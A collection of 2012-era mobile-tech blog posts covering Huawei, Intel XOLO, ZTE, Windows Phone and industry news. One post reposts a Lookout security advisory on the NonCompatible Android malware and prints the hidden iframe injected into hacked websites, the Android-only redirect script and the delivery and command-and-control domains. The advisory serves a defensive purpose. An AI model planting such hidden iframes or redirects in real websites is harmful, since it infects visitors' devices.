Japanese commerce giant Rakuten leads a $100m funding round in the pin-an-image application that is Pinterest. Rakuten already own the ebook company Kobo and its ebook eReaders.

Hiroshi Mikitani, chief executive of Rakuten had this to say about social discovered and how this helps to increase the potential to commerce and the development of images over text on the internet.

We talked about how we can help each other and we can help their presence in Japan which is one of the major markets in the internet industry

Are Rakuten sites already using the “Pin it” badge?
Not at this moment but we are going to.

Pinterest is more targeted. They use beautiful graphics very effectively to create interest circles. They are extremely good at it. Because of that, the traffic coming from Pinterest probably will have a very high conversion rate. That is why I think they are very good at this discovery shopping.

How will the US market take to Huawei’s own branded devices? We’re set to find out as the Chinese handset maker is planning a big push in the US market.

Pronounced “wa-way”, Huawei is hoping to replicate the success of companies such as Samsung, LG, Acer and HTC who have all made the transition and success from Asia to the key US market.

Huawei has a big presence already in the US market, having been a key device partner (especially for network equipment and network equipment) for networks throughout the US and with sales of $1 billion in the US, it’s no surprise that the company wants to do more in the US market, which is key to the long-term success and profitability for any company in the telecommunications industry.

Huawei has provided many network-branded devices in the UK, including the Vodafone Smart and several Orange branded devices and with the release of the Huawei Ascend G300 (G300 hands on), the company has finally launched its own brand products as part of the global push.

Huawei’s flagship quad-core Ascend D-Quad is also set to land in the UK later this year and you can see our hands on with that device here.
Last week we spent a few minutes with the Intel XOLO X900 and the first device to run Intel’s Medfield processor is stunningly beautiful. It’s gracious, a really different yet brilliant design and the display is definitely great.

Here’s a quick recap of the Intel XOLO specs:

1.6 GHz Intel Atom CPU

4.03 inch TFT capacitive LCD display, 1024 x 600 pixels resolution

Intel’s new CPU is definitely FAST! Everything seemed to load with ease and the device will probably perform even faster once it gets the redesigned Android 4.0 Ice Cream Sandwich update. We’ve already heard the device is headed to Orange in the UK as the Intel Santa Clara and at the right price, Intel’s device will definitely fly off the shelves.

Huawei is back in the UK with two further entry-level smartphones, the Ascend Y100 and the G7105, which will both launch as exclusive to network operator O2.

Whilst not as good as the Huawei Ascend G300, which is exclusive to Vodafone, the two devices reaffirm the Chinese company’s commitment to the low-end market whilst their flagship Ascend D-Quad smartphone, which is set to launch in the UK later this year, will target the high-end market for the company.

The Huawei Ascend Y100 features a 2.8 inch touchscreen display with Android 2.3 Gingerbread and a 2 megapixel camera, which Huawei say supports video recording at 30 frames per second, the only device in this price range to do so. The Ascend Y100 will launch on June 1st for £79.99 on PAYG or free from £10 per month on pay monthly contracts.

The Huawei G7105 takes the company back to their feature phone roots, offering very little other than a 2.8 inch LCD display and 1.3 megapixel camera with 4x digital zoom. The G7105 does not feature WiFi connectivity, but ships with Opera Mini, which should reduce the data usage whilst speeding up page load times. The G7105 is available now for £39.99 in white.

Intel’s XOLO X900 smartphone, the first to run the Intel Medfield processor, first became official thanks to Orange unveiling it back in February. Orange have already announced the XOLO X900 will head to their network as the Intel Santa Clara (following on from Orange’s own device branding which features names such as Orange Barcelona and Orange San Francisco).

The XOLO X900 is definitely a sweet looking device, and we’ve got our hands on with the device coming up in the next few hours. In the meantime, here’s the full specs list for the Intel XOLO X900.

Huawei, a manufacturer who has been providing white label handsets and modems to partners for many years, has recently undertaken the decision to “go-it-alone”, similar to HTC, by reaching out and releasing devices under their own company branding.

At Mobile World Congress in February, Huawei (pronounced wah-wey) unveiled one of the first dual-core smartphones, the Huawei Ascend D-Quad, which will take care of the high end market for the company and for the low-cost market, the company has teamed up with Vodafone to bring the Huawei G300 to the UK.

Costing just £100 (+ topup) on Pay as you Go through Vodafone, the G300 brings a 4 inch display, 1GHz CPU and Android 2.3 Gingerbread to the low cost market, leading the G300 to be one of the best value for money smartphones at that price.

The Huawei G300 has arrived at UKMR HQ and as part of the reviews process, here’s our hands on gallery.

Intel has developed several new smartphones of late, running on the Android operating system. Last week one of the first devices the Intel Lava Xolo arrived in Asia.

The Orange Santa Clara is expected to arrive in the UK fairly soon and will be Intel’s first Android smartphone to come to the UK.

Orange UK has opened a ‘register your interest’ page on the Orange Santa Clara so we would think that the device will not be too much longer before it arrives on the shelves. Santa Clara is only the pre-launch name and the full name will be announced when the product is launched.

The Intel Medfield has been talked about for some time and it is hoped that it will bring new featured and perhaps capabilities to the new devices.

The Android phone is under attack by a new form of hacking attempt. Please read the full information below and be wary of installing any unofficial products or apps.

Security Alert: Hacked Websites Serve Suspicious Android Apps (NonCompatible)

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NonCompatible.

How it Works

In this specific attack (called NonCompatible), if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to your phone, you must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, they will not be affected by the application; however, if a user does have the unknown sources setting enabled, installing the app will result in their device becoming infected.

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Technical Summary

Suspicious applications are currently served from the following sites:

· gaoanalitics.info

· androidonlinefix.info

Command and Control (C&C) domains include:

· notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous. As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.

The Intel LAVO XOLO X900 looks a bit disturbing by its name alone. However, put that aside and we have Intel’s first smartphone.

The new X900 arrives with a 4 inch 1024 x 600 resolution display and will run on a 1.6GHz Intel Atom Z2460 processor. The processor is at the higher end of the CPU’s that we tend to talk about and we will bring you more on that when we have an in-depth review at a later date.

The X900 unfortunately does not come boxed with Android’s latest operating system, Android 4.0 but it will be getting an upgrade to the Ice Cream Sandwich very soon.

We bring you this unboxing video from CJ.

One of Huawei’s 2012 range, the Ascend P1S will not make it to the UK or Europe the manufacturer has confirmed, quoting the price of the smartphone versus cheaper competition as one of the reasons for delaying the launch of the world’s slimmest smartphone.

The Ascend P1S, part of Huawei’s Ascend Platinum range, is quoted at being just 6.68mm thick, making it the world’s thinnest smartphone to date and with features like a 4.3 inch Super AMOLED display with qHD (960×540 pixels) resolution, 1.5GHz dual-core CPU and 8 megapixel camera inside the super slim profile, the P1S looks set to possibly confined to a late/non-existent launch.

The P1S’ slightly thicker brother, the P1 is still set for a July launch in Europe, with Germany likely to be the initial launch destination; versus its slimmer brother, the P1 measures in at 7.69 mm which is slim in itself, whilst featuring a similar specs list. The P1 is set for a €450 sim-free launch price, which is the equivalent of around £400 in the UK once taxes and subsidies are taken into consideration.

We’re still waiting on news of the P1 and D-Quad release dates in the UK, but rest assured we’ll bring you the news as soon as it breaks.

Huawei’s Ascend P1 S was thought to be the thinnest that a smartphone can get. However, before its even arrived, its claim has been beat.

Chinese company, Oppo has revealed some information on its latest device. The smartphone is 6.65mm thick -which beats the Ascend as 0.03mm thinner. Further information about the device reveals it has a metallic bezel around the device and features a rich black finish with 3 capacative keys.

We have no further definitive details about the Oppo but it will take more than being the ‘World’s Thinnest Smartphone” to capture consumers. We hope to bring you more information on the Oppo and Ascent as soon as we can.

ZTE, the Chinese handset maker that provides white label devices to several manufacturers, is aiming to gain a slice of the phone/tablet “phablet” market using the success of the Samsung Galaxy Note as a benchmark.

ZTE’s head of handset strategy, Lv Qianhao, said to reporters:

“We want to come up with the next generation of a Galaxy Note-type product – a combo product of handsets and tablets.”

ZTE is also looking at becoming a worldwide player in the tech industry, following the lead of HTC who used to act as a white label manufacturer and has now established themselves as a brand in the ever competitive industry.

ZTE released eight devices at February’s Mobile World Congress and the company is aiming at releasing as many later this year.

T-Mobile’s Vivacity is the Orange San Francisco II in a different form, though they are both ZTE Crescent in all but name.

It arrives with Android 2.3 along with a 5-megapixel camera. The Vivacity has dropped to an all time new low of £84.99 though you will need to pick up a £15 top-up voucher on PAYG before you can take it home. This brings the Vivacity within the same price range as the new entrant Huawei Ascend G300.

Because of the newer device and functions of the Ascend G300 we expect it will storm to the number one position in the sub £100 category of Android devices.

News breaks today that suggests Microsoft could be set to introduce a form of OEM branding and customisation in the upcoming smartphone version of Windows 8. The news comes via Netbook News who today report that Microsoft is preparing a Sit down meeting with Windows Phone partners to discuss the upcoming Windows Phone Apollo platform.

There is very little confirmed news re the meeting except for the agenda which reads:

Apollo Review

Windows Phone Schedules and release plans/processes

Customization & Differentiation opportunities

New Windows Phone 8 application development capabilities

What’s new feature review of Apollo

Connectivity and APN management

Better together with Windows 8

Some website have taken the “Customization & Differentiation opportunities” part of the agenda as confirmation that Microsoft will allow their partners to customise the experience deeply, but I’d expect the Redmond based company to allow their partners some degree of flexible control and differentiation whilst retaining the platform’s Metro UI and look and feel.

It is also possible that Microsoft wants their partners to push the platform over their Android devices; Android remains the only truly customisable platform for OEMs and partners which is why they tend to choose that over Windows Phone. A more customisable and hence differentiated Windows Phone Apollo would appeal to both OEMs and in fact mobile networks who could include their own branding and services and this could be just what Microsoft needs to firmly establish the platform as the choice of manufacturers and partners.

This will be a welcome move for consumers looking to buy a Windows Phone in the United Arab Emirates. The new online Waha Store, Waha means oasis in Arabic will sell devices from a number of manufacturers.

Brightpoint’s president, Anurag Gupta, has this to say:

“Our expertise in offering e-commerce and supply chain solutions will make Waha the go-to place for all UAE customers who have been awaiting a well-functioning channel to access Windows Phones. We look forward to supporting Waha’s launch in other countries in the Middle East and Africa, as we continue to expand our presence in the region.”

At present there is no Windows Phone marketplace but plans are being worked out to bring it to the UAE in the next few months.

The Panasonic ELUGA is headed for the UK after its launch in Japan and Germany.

The ELUGA, a smart-name which stands for”elegant user-orientated gateway” is unique in more than its name. It is a waterproof and dustproof device along with its being a stylish and beautiful device. The ELUGA arrives with 8 megapixel camera and a 4.3 inch AMOLED qHD screen display. Android 2.3.5 will be the operating system with an Android 4.0 update to Ice Cream Sandwich coming at a later date.

There is a little bit of restriction in the device, in that it only has 8GB of storage on board and has no capacity for a micro SD so you will not be able to expand the memory. However, this should not be major obstacle as many devices such at the iPhone also comes in a slimmed down version with 8GB of storage. The device will run on a dual-core 1GHz TI OMAP 4430 processor. The device is due to arrive in the uk on 24 April.

However, if you can be a little patient, there is an upgraded version of the ELUGA rumoured with a 5 inch display, dual-core 1.5GHz and microSD slot.

We will bring you more news on the new device as soon as we have it.

In the meantime the ELUGA can be taken home for €365.

Huawei has released the Ascend G300.

At £100 it is a smartphone for everyone and Huawei states it wants the Ascend G300 to “deliver across the board”. However, despite the rock-bottom price for the smartphone, the company promises more. So we expect to see more budgetable smartphone arriving in the near future.

The Ascend G300 arrives with a 5 megapixel camera and 1500mAh battery promising “exceptional life” and the device will be run by a 1GHz processor.

We hope to have the device fairly soon so that we can bring you a full review. The G300 will receive Android 4.0, Ice Cream Sandwich at a later date.

Despite being an entry-level device, the Ascend G300 has customisable options for the lock screen and can stream content. Huawei is in talks with Sky so it is likely that we will see a video-on-demand coming soon.

Announced at Mobile World Congress in February, the Chinese company’s flagship device is set to do battle with Apple’s iPhone, HTC’s One Series and the upcoming Samsung Galaxy S3.

The Ascend D quad is expected later this year and its swelter design, Android 4.0 Ice Cream Sandwich platform, and Huawei’s own quad-core K3V2 processor is much looked forward to. The Huawei Ascend D-Quad, which we went hands on with, is expected to land on contract at around £35 per month once released.

In addition to the Ascend D quad, the Ascend P1 S the ‘world’s slimmest smartphone’ and the Ascend P1 will also be head to the UK as soon July.

The Huawei devices are not a range I have come across before in person, so it would be nice to review the products, first hand, when they arrive.

For some, the traditional written, paper-bound book is best and an e-book or reader just will not do. Today, those readers may have cause for a celebration.

Yahoo has today filed a patent to bring advertising to e-books. The proposal would allow advertising in e-books related to what the consumer will pay based on the number and position of the advertise within the text.

“Greater levels of advertising, which may be more valuable to an advertiser and potentially more distracting to an e-book reader, may warrant higher discounts,” said the paperwork filed with the US Patent and Trademark Office last week. “Higher frequencies may even be great enough to allow the e-book to be obtained for free.”

Advertising is not new to e-readers and are already part of Amazon’s and Kobo’s offering. However, advertising on those mediums is restricted to menu screens and when the device is switched off. The patent by Yahoo brings advertising directly within the e-book and could include hyperlinked, words, graphical advertisings, inlaid text or a video or audio.

“In some embodiments, advertising can be based on a mood and setting of content being accessed. For example, if the setting includes young characters, a Coke advertisement could be provided, inviting the reader to enjoy a glass of Coke with his or his book, and providing a graphic of a cool glass of Coke,” one suggestion said.

According to the proposal, readers could even select adverts based on their class: “As a simple example, high class advertising may include generally high-impact or highly targeted, relatively desirable advertising. Middle class advertising could include everyday types of advertisements, such as advertisements for everyday products like pizza, etc. Lower class advertising could include advertisements that may be pervasive or generally undesirable, such as teeth whitener advertisements, ‘lower your mortgage’ type advertisements.”

Those selecting lower class ads could even get their ebook cheaper thanks to “a higher or increased discount”.

Are you ready to receive advertising in the middle of your reading a gruesome thriller or an intense drama?

The US' "Big Four" carriers announce plans to introduce a collective database of stolen phones to prevent their use in the US, similar to the UK's current database.

The big four network carriers in the US, Verizon, AT&T, Sprint and T-Mobile, have today announced plans to introduce a database containing the IMEI (identification) numbers of stolen mobile devices.

One of the biggest problems that affects mobile users worldwide is stolen phones, of which there are growing numbers, and the use of them afterwards. The UK operates a national crime database which disables the use of any handset listed as stolen (or lost even) on any UK network. However, these devices work freely outside the UK.

With the US’s top four carriers catering for around 90% of mobile device usage in the US, the idea of a combined database makes perfect sense and should prohibit the use of those devices on any of the four carriers. The combined database should launch within six months and there are plans to make this into a national database within 18 months, disabling the use of any of those devices on any US network. The plans are being backed by CTIA.

There are four voluntary industry commitments in place in the US, which address the issue of stolen devices:

Implement databases to prevent reactivation of stolen smartphones.

(A) Notify consumers of features to secure/lock smartphones with passwords.
(B) Educate consumers about features to secure/lock smartphones with passwords.

Educate consumers about applications to remotely lock/locate/erase data from smartphones.

Educate consumers about smartphone theft, protections and preventative measures.

The plans are sure to be a great deterrent against mobile phone theft and this could eventually lead to cross-Atlantic (or even global) co-operation to prevent the use of stolen smartphones around the world.

More on this when we get it.

Amazon has been testing in-app purchase for its Appstore for Android and Kindle Fire and has officially announced the new feature.

The in-app purchase is similar to that of Apple’s offered in the iTuens App Store and iOS and by Google in its Google Play Store. Customers will be able to purchase add-ons and subscription from the Amazon Appstore, which will be downloaded from within the app without the user having to go back to the Appstore itself.

Each in-app purchase will reportedly give Amazon a 30 percent cut, again similar to the cut taken by Apple and Google app stores.

Amazon notes that users will be able to take advantage of purchases via its “seamless and secure 1-Click purchasing experience’.

The tablet looks super cool and futuristic so it would be great to see it become a reality!

The war over Nano-sims heats up with Apple offering royalty-free use of its nano-sim design.

Apple has raised the stakes in the debate of nano-sims, by promising free use of its nano-sim design to any companies who help the company win the battle over the design. Apple recently submitted their design to the European Telecommunications Standards Institute (ETSI), but many companies felt that if Cupertino-based Apple’s design was approved, the company would hold patents over a key piece of upcoming technology (even though it is just a sim card).

According to FOSS Patents, Apple sent a letter to ETSI offering ““an unequivocal commitment to grant royalty-free licenses to any Apple patents essential to nano-SIM.”

One of the key issues in the debate is other companies who claim that Apple’s nano-sim design is technically flawed, as it can potentially jam in existing devices.

The battle over the next-gen Nano-sim card design should be resolved when the different designs go head to head at the Smart Card Platform Plenary meeting in France later this week.

This is part of Huawei new Ascend line of high end phones as they try to crack into a market dominated by Samsung, HTC and Motorola.

Can the Huawei Ascend line of phones make them the next HTC ? only time will tell but they are giving it a good go and I look forward to playing with this device when it launches with rumours of the device hitting around July this year.

The boundary between Table and Laptop ceases today with the unveiling of Toshiba’s 13.3-inch tablet.

The prototype tablet is one of the innovative products to come from the company and not much details about the giant has been released. However the 13.3-inch is the normal size of many laptops on the market. The AT330, the only name we have the device so far, is powered by a quad-core Tegra 3 and will feature a 5-megapixel camera. The AT330 is rumoured to arrive with a collapsable antenna and TV tuner. Android 4.0 Ice Cream Sandwich should be installed as standard.

We will bring you more on the AT330 as soon as we have it. But for now, take a look at the biggest tablet to date, the At330.
